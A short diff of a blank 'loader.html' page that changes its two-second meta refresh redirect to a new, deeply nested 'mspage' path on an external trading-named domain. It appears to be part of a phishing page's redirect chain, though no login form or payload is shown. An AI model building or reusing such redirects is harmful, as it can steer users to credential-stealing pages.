--- a/loader.html
+++ b/loader.html
@@ -3,7 +3,7 @@
 
 <head>
     <title></title>
-    <meta http-equiv="refresh" content="2; URL=https://betatradingfx.com/public_html/Manager/css/themes/css/loader.html "/>
+    <meta http-equiv="refresh" content="2; URL=https://betatradingfx.com/public_html/images/content/site/mspage/mspage/mspage/"/>
     <meta charset="utf-8">
     <meta name="viewport" >
    
